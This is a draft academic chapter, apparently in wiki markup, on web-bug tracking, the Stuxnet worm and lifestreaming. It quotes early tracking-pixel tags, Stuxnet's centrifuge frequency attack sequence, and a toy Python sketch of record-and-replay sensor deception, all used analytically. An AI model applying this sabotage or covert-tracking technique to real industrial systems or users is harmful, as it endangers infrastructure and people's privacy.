&amp;lt;blockquote&amp;gt;Provid[ing] real-time analytics to web sites and blogs. The interface tracks visitors, load times, and referring sites on a minute-by-minute basis. This allows real-time engagement with users giving publishers an opportunity to respond to social media events as they happen. ChartBeat also supports mobile technology through APIs. (Ghostery, 2012b)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Web bugs perform these analytics by running code in the browser without the knowledge of the user; should that code be observed, it looks extremely complicated.[4] Here are two early web bugs (web 1.0) collected by the Electronic Frontier Foundation (EFF) (1999): &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;&lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;img src=&amp;quot;http://ad.doubleclick.net/ad/pixel.quicken/NEW&amp;quot; width=1 height=1 border=0&amp;amp;gt;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;IMG WIDTH=1 HEIGHT=1 border=0 SRC=&amp;quot;http://media.preferences.com/ping?ML_SD=IntuitTE_Intuit_1x1_RunOfSite_Any&amp;amp;amp;db_afcr=4B31-C2FB-10E2C&amp;amp;amp;event=reghome&amp;amp;amp;group=register&amp;amp;amp;time=1999.10.27.20.56.37&amp;quot;&amp;amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Later web bugs (web 2.0) are not included here due to the complexity and length of the code (but see the 3rd-party elements, or ‘3pes’, at http://www.knowyourelements.com/ ).[5] It is noticeable that this code is extremely opaque and difficult to understand, even for experienced computer programmers. Indeed, one suspects an element of obfuscation, a programming technique used to reduce the readability of code in order to shield the company from observation. So far, in checking a number of web bugs on a variety of websites, I have been unable to find one that supplies any commentary on what exactly the code is doing, beyond a short privacy policy statement. Again, Ghostery (2012b) usefully supplies some general information on the web bug, such as the fact that it has been found on over 100,000 websites across the Internet, and that the data collected is 'anonymous (browser type), pseudonymous (IP address)'; the data is not shared with third parties, but no information is given on data retention policies. As of 2nd March, 2012, Ghostery reported that it was tracking 829 different web bugs across the Internet. This is a relatively unregulated market in user behaviour, tracking and data collection, which currently has a number of self-regulatory bodies, such as the Network Advertising Initiative (NAI). As Madrigal reports: 'In essence, [the NAI] argued that users do not have the right to *not* be tracked. &amp;quot;We've long recognized that consumers should be provided a choice about whether data about their likely interests can be used to make their ads more relevant,&amp;quot; [they] wrote. &amp;quot;But the NAI code also recognizes that companies sometimes need to continue to collect data for operational reasons that are separate from ad targeting based on a user's online behavior.&amp;quot;… Companies &amp;quot;need to continue to collect data,&amp;quot; but that contrasts directly with users' desire &amp;quot;not to be tracked.&amp;quot;' (Madrigal, 2012). [Eds: please check that the single and double quotation marks here are correct]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; These web bugs, beacons, pixels, and tags, as they are variously called, form part of the dark-net surveillance network that users rarely see, even though it is profoundly changing their experience of the internet in real-time by attempting to second-guess, tempt, direct and nudge behaviour in particular directions. Ghostery ranked the web bugs in 2010 and identified the following as the most frequently encountered (above average): Revenue Science (250x), OpenX (254x), AddThis (523.6x), Facebook Connect (529.8x), Omniture (605.7x), Comscore Beacon (659.5x), DoubleClick (924.4x), QuantCast (1042x), Google Adsense (1452x), Google Analytics (3904.5x) (Ghostery, 2011). As can be seen from these relative frequencies, Google is by a long distance the biggest player in the area of user statistics collection. This data is important because, as JP Morgan's Imran Khan explained, a unique visitor is worth $189 at [http://www.businessinsider.com/blackboard/amazon Amazon] (e-commerce) and $24 at [http://www.businessinsider.com/blackboard/google Google] (search); and although Facebook (social networking) generates only $4 per user, this is a rapidly growing number (Yarrow, 2011). Keeping and holding these visitors, through real-time analytics, customer history, behavioural targeting, etc., is becoming extremely profitable. Ghostery (2010) has performed a useful analysis of their web bug database that attempts to categorise the web bugs found into 16 different types, which I have re-categorised into four main types: (1) Advertiser/Marketing Services, (2) Analysis/Research Services, (3) Management Platforms, (4) Verification/Privacy Services: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
1. '''Advertiser/Marketing Services''': &lt;br /&gt;
&lt;br /&gt;
*a. Advertiser: A company sponsoring advertisement and ultimately responsible for the message delivered to the consumer. Example: [http://www.att.com/ AT&amp;amp;amp;T] &lt;br /&gt;
*b. Exchange: A provider of a marketplace connecting advertisers to ad networks and data aggregators (online and off), often facilitating multiple connections and bidding processes. Example: [http://www.rightmedia.com/ Right Media] &lt;br /&gt;
*c. Network: A broker and often technology provider connecting advertisers and publishers (website operators). Example: [http://www.burstmedia.com/ Burst Media] &lt;br /&gt;
*d. Publisher: A website operator who displays ads for advertiser(s) in various types of campaigns. Example: [http://www.nytimes.com/ The New York Times]&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
2. '''Analysis/Research Services''': &lt;br /&gt;
&lt;br /&gt;
*a. Online Data Aggregator: Collects data from online publishers and provides it to advertisers either directly or via exchange. Example: [http://www.bluekai.com/ BlueKai] &lt;br /&gt;
*b. Offline Data Aggregator: Collects data from a range of offline sources and provides data to advertisers directly or via exchange. Example: [http://www.experian.com/ Experian] &lt;br /&gt;
*c. Optimizer: Provider of analytics technology and services for ROI assessment and content optimization purposes. Example: [http://www.roilabs.com/ ROILabs] &lt;br /&gt;
*d. Research: Collects data for market research purposes where no ads are served through this data. Example: [http://www.safecount.net/ Safecount] &lt;br /&gt;
*e. Analytics Provider: Provider of cross-platform statistical analysis to understand market effectiveness and audience segmentation. Example: [http://www.google.com/analytics/ Google Analytics] &lt;br /&gt;
*f. Retargeter: Provider of technologies that allow publishers to identify their visitors when they place ads on third-party sites. Example: [http://www.fetchback.com/ Fetchback]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
3. '''Management Platforms''': &lt;br /&gt;
&lt;br /&gt;
*a. Demand-Side Platform: A technology provider that allows marketers to buy inventory across multiple platforms or exchanges. DSPs often layer in custom optimization, audience targeting, real-time bidding and other services. Example: [http://www.invitemedia.com/ Invite Media] &lt;br /&gt;
*b. Supply-Side Platform: A technology provider that allows publishers to access advertiser demand across multiple platforms or exchanges. SSPs often layer in custom yield optimization, audience creation, real-time bidding and other services. Example: [http://www.admeld.com/ AdMeld] &lt;br /&gt;
*c. Ad Server: Technology that delivers and tracks advertisements independently of the web site where the ad is being displayed. Example: [http://www.doubleclick.com/ DoubleClick DART] &lt;br /&gt;
*d. Agency: Provider of creative and buying services (both audience and data) for advertisers. Example: [http://www.mediacom.com/en/home.aspx MediaCom]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
4. '''Verification/Privacy Services''': &lt;br /&gt;
&lt;br /&gt;
*a. Ad Verification: Certifies or classifies webpages in an effort to prevent advertisers’ campaigns from running on unsavory or blocked content, and/or protects advertisers from having other companies run their ads incorrectly. Example: [http://www.clickforensics.com/ ClickForensics] &lt;br /&gt;
*b. Online Privacy: Technology providers that deliver information and transparency to consumers on how 3rd-party companies gather and use their data. Example: [http://www.betteradvertising.com/ Better Advertising]&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:LUMAadvertising.jpg|left|500x450px|Image 1: Display Advertising Technology Landscape (Luma, 2010)]] &amp;lt;br&amp;gt; ''Image 1: Display Advertising Technology Landscape (Luma, 2010)''&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; Ghostery gives a useful explanation of how these companies interoperate to perform a variety of services for advertising and marketing clients: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;A company like [http://www.turn.com/ Turn Media] is a technology provider that allows marketers to buy inventory across multiple platforms or exchanges, or a Demand-Side Platform. They provide services for marketers and agencies to centrally manage buying, planning, targeting, and optimizing media opportunities. Reasonably speaking, however, you could also technically classify them as an Optimizer because this process is included under the umbrella of the platform. Turn [Media] is deeply data driven and partners with multiple data providers including [http://www.bluekai.com/ BlueKai], [http://www.targusinfo.com/ TargusInfo], [http://www.exelate.com/new/index.html eXelate], and others (Ghostery, 2010). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Of course, one element missing from this typology is that of surveillance, and indeed it is no surprise that web bugs form part of the tracking technologies used by companies to monitor staff. For example, in 2006 Hewlett Packard used web bugs from [http://readnotify.com/ readnotify.com] to trace insider leaks to the journalist Dawn Kawamoto, and later confirmed in testimony to a U.S. House of Representatives subcommittee that it is ‘still company practice to use e-mail bugs in certain cases’ (Evers, 2006; Fried, 2006). &lt;br /&gt;
&lt;br /&gt;
As can be seen, this is an extremely textured environment that currently offers little in terms of diagnosis or even warnings to the user. The industry itself, which prefers the term “clear GIF” to web bug, is certainly keen to avoid regulation, and keeps itself very much to itself in order to avoid attracting unwarranted attention. Some of the current discussions over the direction of regulation on this issue have focused on the “do not track” flag, which would signal a user's opt-out preference within an HTTP header. Unfortunately, very few companies respect the do-not-track header, and there is currently no legal requirement that they do so in the US, or elsewhere (W3C, 2012). See, though, the current debate over the EU ePrivacy Directive, where the Article 29 Working Party (A29 WP) has stated that ‘voluntary plans drawn up by Europe's digital advertising industry representatives, the European Advertising Standards Alliance (EASA) and IAB Europe, do not meet the consent and information requirements of the recently revised ePrivacy Directive’ (Baker, 2012). [Eds: would this final point be better in a footnote?]&amp;amp;nbsp; &lt;br /&gt;
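&lt;br /&gt;
It is worth noting how little the ‘do not track’ mechanism amounts to in code: the DNT header itself is real, but acting on it is entirely voluntary, as this hypothetical server-side check illustrates: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
# The DNT header is real; performing this check is purely voluntary.
def may_track(request_headers):
    """Return False when the browser sent the opt-out flag DNT: 1."""
    return request_headers.get("DNT") != "1"

print(may_track({"DNT": "1"}))   # False - the user opted out
print(may_track({}))             # True - silence is treated as consent
&amp;lt;/pre&amp;gt; &lt;br /&gt;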
&lt;br /&gt;
One of the newer web bugs, and perhaps indicative of the direction of travel, is [http://www.persianstat.ir/ PersianStat], an Iranian web tracking and data analytics service which claims 'an eye on 1091622 websites', and which shows that this new code ecology is not a purely Western phenomenon. With the greater use of computational networked devices in everyday life, from mobile phones to GPS systems, these forms of tracking systems will only become more invasive and aggressive in collecting data from our everyday lives and encounters. Indeed, it is unsurprising to find that Americans, for example, are not comfortable with the growing use of these tracker technologies. Pew (2012) found, &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;that 73 percent of Americans said they would &amp;quot;not be okay&amp;quot; with being tracked (because it would be an invasion of privacy)… Only 23 percent said they'd be &amp;quot;okay&amp;quot; with tracking (because it would lead to better and more personalized search results)… Despite all those high-percentage objections to the idea of being tracked, less than half of the people surveyed -- 38 percent -- said they knew of ways to control the data collected about them. (Garber, 2012; Pew, 2012) &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The contradiction between the ability of these computational systems and surfaces to supply a commodity to the user, and the need to raise income through the harvesting of data that is in turn sold to advertisers and marketing companies, shows that this is an unstable situation. It also serves to demonstrate the extent to which users are simply unaware of the subterranean depths of their computational devices, and of the ability of these general computing platforms to disconnect the user interface from the actual intentions or functioning of the device, whilst giving the user the impression that they remain fully in control of the computer. As Garber observes, ‘underground network, surface illusion… How much do we actually want to know about this stuff? Do we truly want to understand the intricacies of data-collection and personalization and all the behind-the-screen work that creates the easy, breezy experience of search ... or would we, on some level, prefer that it remain as magic?’ (Garber, 2012). This issue is helpfully illustrated by the next case study, of the Stuxnet virus, which shows the extent to which the magic of software can conceal its true function. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Stuxnet'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
This next example is a computer worm called Stuxnet,[6] which experts now believe was aimed at the Iranian uranium-enrichment facility at Natanz.[7] The Stuxnet worm, a subclass of computer virus, copied itself repeatedly across computer systems until it found the host that met its ‘strike conditions’, that is, the location it was designed to attack, whereupon it activated its ‘digital warhead’, which may monitor, damage, or even destroy its target. The name ‘Stuxnet’ is ‘derived from some of the filename/strings in the malware - mrxcls.sys, mrxnet.sys’: the first part, 'stu', comes from the (.stub) section of mrxcls.sys, and the second part, 'xnet', comes from mrxnet.sys (Kruszelnicki, 2011; mmpc2, 2010). Due to the sophistication of the programming involved, this worm is considered to have reached a new level in cyberwarfare. Stuxnet has been called the first 'weaponized' computer virus, and it would have required huge resources, such as a test facility to model a nuclear plant, to create and launch it (Cherry, 2010). As Liam O Murchu, an operations manager for Symantec, explained, &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Unlike the millions of worms and viruses that turn up on the Internet every year, this one was not trying to steal passwords, identities or money. Stuxnet appeared to be crawling around the world, computer by computer, looking for some sort of industrial operation that was using a specific piece of equipment, a Siemens S7-300 programmable logic controller. (60 Minutes, 2012b).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;The Stuxnet worm works by undertaking a very complex stealth infection, covering its tracks by recording data from the nuclear processing system which it then plays back to the operators to disguise the fact that it is actually gently causing the centrifuges to fail. This is known as a ‘man-in-the-middle attack’ because it fakes industrial process control sensor signals, so that an infected system does not exhibit abnormal behaviour and therefore raises no alarm. Again, cleverly, the faults it creates in the plant are likely to occur weeks after the act of sabotage, and in a targeted way, through the fatiguing of the motors; this looks like a standard failure rather than an attack. Indeed, Iran later confirmed that a number of its centrifuges had been affected by an attack (CBS News, 2010).&amp;amp;nbsp;A ‘senior Iranian intelligence official said an estimated 16,000 computers were infected by the Stuxnet virus’ (Associated Press, 2012). The Stuxnet worm is also interesting because it has built-in ''sunset code'' that causes the worm to erase itself after 24 June 2012, and hence hide its tracks. As Zetter explains: &lt;br /&gt;
&amp;lt;blockquote&amp;gt;once the code infects a system, it searches for the presence of two kinds of frequency converters made by the Iranian firm Fararo Paya and the Finnish company Vacon, making it clear that the code has a precise target in its sights… Stuxnet begins with a nominal frequency of 1,064 Hz… then reduces the frequency for a short while before returning it back to 1,064 Hz… Stuxnet [then] instructs the speed to increase to 1,410 Hz, which is “very close to the maximum speed the spinning aluminum IR-1 rotor can withstand mechanically,”… [but] before the rotor reaches the tangential speed at which it would break apart… within 15 minutes after instructing the frequency to increase, Stuxnet returns the frequency to its nominal 1,064 Hz level. Nothing else happens for 27 days, at which point a second attack sequence kicks in that reduces the frequency to 2 Hz, which lasts for 50 minutes before the frequency is restored to 1,064 Hz. Another 27 days pass, and the first attack sequence launches again, increasing the frequency to 1,410 Hz, followed 27 days later by a reduction to 2 Hz. (Zetter, 2011)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Stuxnet disguises all of this activity by overriding the data control systems and sending commands to disable warning and safety controls that would normally alert plant operators to these dangerous frequency changes. Stuxnet is interesting because it is not a general-purpose attack, but is designed to unload its digital warheads under specific conditions against a specific threat target. It is also remarkable in the way in which it disengages the interface, the screen for the user, from the underlying logic and performance of the machine. &lt;br /&gt;
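&lt;br /&gt;
The record-and-replay structure of such an attack can be sketched conceptually. The following is emphatically ''not'' Stuxnet's code (which targets PLCs, not Python interpreters); it is a toy illustration, with invented sensors and values, of how a man-in-the-middle layer can feed operators stale normality while commanding the hardware to do something else: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
# Conceptual toy only; sensors, values and timings are invented.
import itertools

def read_sensor():
    """Stand-in for a live process sensor (nominal frequency, Hz)."""
    return 1064.0

# Phase 1: record a window of normal readings while behaving innocently.
recorded = [read_sensor() for _ in range(100)]

# Phase 2: the operator console is now fed the recording, not live data,
# while the actual command stream drives the process off-nominal.
replay = itertools.cycle(recorded)

def display_value():
    return next(replay)   # what the operators see: yesterday's normality

def process_command():
    return 1410.0         # what the hardware is actually told to do
&amp;lt;/pre&amp;gt; &lt;br /&gt;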
&lt;br /&gt;
Indeed, there has been a great deal of speculation about whether a state would have been required to develop it, given the complexities involved in testing such a worm before releasing it into the wild (Markoff and Sanger, 2010). Richard Clarke, the former chief of counter-terrorism under Presidents Clinton and Bush, argues that the built-in fail-safes are an important clue to Stuxnet’s source and that they point to the kinds of procedures found in a Western government. He says, ‘If a [Western] government were going to do something like this…then it would have to go through a bureaucracy, a clearance process, [and] somewhere along the line, lawyers would say, “We have to prevent collateral damage,” and the programmers would go back and add features that normally you don’t see in the hacks. And there are several of them in Stuxnet’ (Gross, 2011). Indeed, the complexity and structure of the worm mean that at least thirty people would have had to work on it simultaneously (Zetter, 2010). This is especially true of a worm that launched a so-called ‘zero-day attack’, that is, one using a set of techniques that are neither public nor known to the developer of the attacked system, in this case Microsoft and Siemens. In actuality it was remarkable for exploiting four different zero-day vulnerabilities (Gross, 2011). Because of the layered approach of its attack and the detailed knowledge required of Microsoft Windows, SCADA (Supervisory Control And Data Acquisition) and PLC (Programmable Logic Controller) systems, this would have been a very large project to develop and launch. Indeed, Eric Byres, chief technology officer for Byres Security, has stated: ‘we’re talking man-months, if not years, of coding to make it work the way it did' (quoted in Zetter, 2010). &lt;br /&gt;
&lt;br /&gt;
The two chief capabilities of Stuxnet are: (1) to identify its target precisely, using a number of software-based markers that give away the physical identity of the location. Indeed, the ‘attackers [had] full, and I mean this literally, full tactical knowledge of every damn detail of [the Natanz] plant’ (60 Minutes, 2012b); and (2) to disengage control systems from physical systems and to provide a stealth infection of the computer system that would fool the operators of the plant (the ‘man-in-the-middle attack’ described above). This was achieved through the use of two ‘digital warheads’, called 417 and 315. The smaller (315) was designed to slowly reduce the speed of the rotors, leading to cracks and failures, while the second, larger warhead (417) manipulated valves in the centrifuges and faked industrial process control sensor signals by modelling the centrifuges, which were grouped into cascades of 164 (Langner, 2011). Indeed, Langner (2011) described this evocatively as ‘two shooters from different angles’. The Stuxnet worm was launched some time in 2009/2010 and shortly afterwards,[8] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;the all-important centrifuges at Iran's nuclear fuel enrichment facility at Natanz began failing at a suspicious rate. Iran eventually admitted that computer code created problems for their centrifuges, but downplayed any lasting damage. Computer security experts now agree that code was a sophisticated computer worm dubbed Stuxnet, and that it destroyed more than 1,000 centrifuges. (60 Minutes, 2012a) &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Hypotheses about Stuxnet's origin have been drawn from an analysis of its approximately 15,000 lines of programming code. This was a close reading and reconstruction of the programming logic, undertaken by taking the machine code, disassembling it, and then attempting to convert it into the C programming language. The code could then be analysed for system function calls, timers, and data structures, in order to try to understand what it was doing (Langner, 2011). Indeed, as part of this process a reference to “Myrtus” was discovered, and the link made to 'Myrtus as an allusion to the Hebrew word for Esther. The Book of Esther tells the story of a Persian plot against the Jews, who attacked their enemies pre-emptively' (Markoff and Sanger, 2010).[9] Whilst no actor has claimed responsibility for Stuxnet, there is a strong suspicion that the United States and/or Israel were involved in the creation of such a sophisticated attack virus. Its attack appears to have been concentrated on a number of selected areas, with Iran at the centre (see Table 1).&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:BerryStuxnet.jpg|left|500x450px|Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.)]] &lt;br /&gt;
&lt;br /&gt;
**Iran - 52.2% &lt;br /&gt;
**Indonesia - 17.4% &lt;br /&gt;
**India - 11.3% &lt;br /&gt;
**Pakistan - 3.6% &lt;br /&gt;
**Uzbekistan - 2.6% &lt;br /&gt;
**Russia - 2.1% &lt;br /&gt;
**Kazakhstan - 1.3% &lt;br /&gt;
**Rest of World - 9.4%&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
''Table 1: Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.).'' &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;Clearly, this kind of attack could be mobilized against targets other than nuclear enrichment facilities, and indeed the stealth and care with which it attempts to fool the operators of the plants show that computational devices will undoubtedly be targets for monitoring, surveillance, control and so forth in the future. But of course, once the code for undertaking this kind of sophisticated cyberattack is out in the wild, it is relatively trivial to decode it and so learn, in a very short time, techniques that would otherwise have taken many years of development. As Sean McGurk explains, ‘you can download the actual source code of Stuxnet now and you can repurpose it and repackage it and then, you know, point it back towards wherever it came from’ (60 Minutes, 2012b). Indeed, a different worm, called Duqu, has already been discovered, albeit one with purposes linked to the collection of data on industrial control systems and structures, a so-called ‘Trojan’ (Hopkins, 2011).[10] As Alexander Gostev reports, &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;There were a number of projects involving programs based on the “Tilded” [i.e. Stuxnet] platform throughout the period 2007-2011. Stuxnet and Duqu are two of them – there could have been others, which for now remain unknown. The platform continues to develop, which can only mean one thing – we’re likely to see more modifications in the future. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The increasing ability of software and code, via computational devices, to covertly monitor, control and mediate, both positively and negatively, is not just a matter of interventions designed to deceive the human and non-human actors that make up these assemblages. In the next section I want to look at the willing compliance with data collection, indeed the enthusiastic contribution of real-time data to computational systems, as part of the notion of lifestreams, and more particularly the quantified-self movement. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Lifestreams'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Lastly, I want to connect these developments in web bugs and worms with the growth in the use of self-monitoring technologies, called lifestreaming, or the notion of the quantified self.[11] These have expanded in recent years as ‘real-time stream’ platforms like Twitter and Facebook have grown. Indeed, some argue that ‘we’re finally in a position where people volunteer information about their specific activities, often their location, who they’re with, what they’re doing, how they feel about what they’re doing, what they’re talking about…We’ve never had data like that before, at least not at that level of granularity’ (Rieland, 2012). This has been usefully described by the ''Economist'', which argues that the, &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;idea of measuring things to chart progress towards a goal is commonplace in large organisations. Governments tot up trade figures, hospital waiting times and exam results; companies measure their turnover, profits and inventory. But the use of metrics by individuals is rather less widespread, with the notable exceptions of people who are trying to lose weight or improve their fitness…But some people are doing just these things. They are an eclectic mix of early adopters, fitness freaks, technology evangelists, personal-development junkies, hackers and patients suffering from a wide variety of health problems. What they share is a belief that gathering and analysing data about their everyday activities can help them improve their lives—an approach known as “self-tracking”, “body hacking” or “self-quantifying”. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This phenomenon of using computational devices to monitor health signals and to feed them back into calculative interfaces, data visualisations, real-time streams, etc. is the next step in social media. It closes the loop of personal information online, which, although it remains notionally private, is stored and accessed by corporations who wish to use this biodata for data mining and innovation surfacing. For example: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;The Zeo [headband], for example, has already generated the largest-ever database on sleep stages, which revealed differences between men and women in REM-sleep quantity. Asthmapolis also hopes to pool data from thousands of inhalers fitted with its Spiroscout [asthma inhaler] sensor in an effort to improve the management of asthma. And data from the Boozerlyzer [alcohol counting] app is anonymised and aggregated to investigate the variation in people’s response to alcohol. (Economist, 2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Lifestreams were originally an idea of David Gelernter and Eric Freeman in the 1990s (Freeman, 1997; Gelernter, 2010), which they described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;a time-ordered stream of documents that functions as a diary of your electronic life; every document you create and every document other people send you is stored in your lifestream. The tail of your stream contains documents from the past (starting with your electronic birth certificate). Moving away from the tail and toward the present, your stream contains more recent documents --- papers in progress or new electronic mail; other documents (pictures, correspondence, bills, movies, voice mail, software) are stored in between. Moving beyond the present and into the future, the stream contains documents you ''will'' need: reminders, calendar items, to-do lists. You manage your lifestream through a small number of powerful operators that allow you to transparently store information, organize information on demand, filter and monitor incoming information, create reminders and calendar items in an integrated fashion, and &amp;quot;compress&amp;quot; large numbers of documents into overviews or executive summaries. (Freeman, 2000)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Gelernter originally described these as ‘chronicle streams’ (Gelernter, 1994), highlighting both their narrative and temporal dimensions related to the storage of documentation and texts. Today we are more likely to think of them as ‘real-time streams’ and the timeline functions offered by systems like Twitter, Facebook and Google+. These are increasingly the model of interface design that is driving innovation in computation, especially in mobile and locative technologies. However, in contrast to the document-centric model that Gelernter and Freeman were describing, there are also micro-streams of short updates, epitomized by Twitter, with its short, text-message-sized 140-character updates. Nonetheless, this is still enough text space to incorporate a surprising amount of data, particularly when geodata, images, weblinks, and so forth are factored in. Stephen Wolfram was one of the first people to collect his data systematically, starting in 1989. As he explains: 'So email is one kind of data I’ve systematically archived. And there’s a huge amount that can be learned from that. Another kind of data that I’ve been collecting is keystrokes. For many years, I’ve captured every keystroke I’ve typed—now more than 100 million of them' (Wolfram, 2012). &lt;br /&gt;
&lt;br /&gt;
This kind of self-collection of data is certainly becoming more prevalent and in the context of reflexivity and self-knowledge, it raises interesting questions. The scale of data that is collected can also be relatively large and unstructured. Nonetheless, better data management and techniques for searching and surfacing information from unstructured or semi-structured data will no doubt be revealing about our everyday patterns in the future.[12] &lt;br /&gt;
&lt;br /&gt;
Mobile 'apps' - small, relatively contained applications that usually perform a single specific function - have accelerated this way of collecting and sending data. For example, the Twitter app on the iPhone allows the user to send updates to their timeline, but also search other timelines, check out profiles, streams and so on. When created as apps, however, they are also able to use the power of the local device, especially if it contains the kinds of sophisticated sensory circuitry that is common in smartphones, to log GPS geographic location, direction, etc. This is when life-streaming becomes increasingly similar to the activity of web bugs in monitoring and collecting data on the users that are active on the network. Indeed, activity streams have become a standard which is increasingly being incorporated into software across a number of media and software practices (see ActivityStreams n.d.). An activity stream essentially encodes a user event or activity into a form that can be computationally transmitted and later aggregated, searched and processed: &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
*In its simplest form, an activity consists of an ''actor'', a ''verb'', an ''object'', and a ''target''. It tells the story of a person performing an action on or with an object -- &amp;quot;Geraldine posted a photo to her album&amp;quot; or &amp;quot;John shared a video&amp;quot;. In most cases these components will be explicit, but they may also be implied. (ActivityStreamsWG, 2011, original emphasis)&amp;lt;br&amp;gt;&lt;br /&gt;
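&lt;br /&gt;
The ‘Geraldine’ example quoted above has a direct serialized form in the JSON Activity Streams 1.0 specification; the sketch below builds such an activity in Python (the identifiers and timestamp are invented, while the actor/verb/object/target shape is the specification's): &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
# Building a minimal 'actor, verb, object, target' activity; ids invented.
import json

activity = {
    "published": "2012-03-02T15:04:55Z",
    "actor": {"objectType": "person",
              "id": "urn:example:person:geraldine",
              "displayName": "Geraldine"},
    "verb": "post",
    "object": {"objectType": "photo",
               "id": "urn:example:photo:1",
               "url": "http://example.org/photos/1.jpg"},
    "target": {"objectType": "photo-album",
               "id": "urn:example:album:2",
               "displayName": "Geraldine's Photo Album"},
}
print(json.dumps(activity, indent=2))
&amp;lt;/pre&amp;gt; &lt;br /&gt;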
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This data and activity collection is only part of the picture, however. In order to become reflexive data it must be computationally processed from its raw state, which may be structured, unstructured, or a combination of the two. At this point it is common for the data to be visualized, usually through a graph or timeline, but there are also techniques such as heat-maps, graph theory, and so forth that enable the data to be processed and reprocessed to tease out patterns in the underlying data set. In both the individual and aggregative use cases, in other words for the individual user (or lifestreamer) and for the organization (such as Facebook), the key is to pattern-match and compare details of the data, such as against a norm, a historical data set, or a population, group, or class of others.[13] &lt;br /&gt;
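&lt;br /&gt;
A minimal sketch of that ‘compare against a norm’ step might look as follows; the data, window size and threshold are invented for illustration: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
# Flag points in a self-tracked series that drift from a rolling baseline.
def flag_outliers(samples, window=7, tolerance=0.25):
    flags = []
    for i, value in enumerate(samples):
        history = samples[max(0, i - window):i]
        if not history:
            flags.append(False)        # no baseline yet
            continue
        baseline = sum(history) / len(history)
        flags.append(abs(value - baseline) > tolerance * baseline)
    return flags

hours_slept = [7.5, 7.0, 7.2, 7.4, 6.9, 7.1, 4.0, 7.3]
print(flag_outliers(hours_slept))      # only the 4.0 night is flagged
&amp;lt;/pre&amp;gt; &lt;br /&gt;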
&lt;br /&gt;
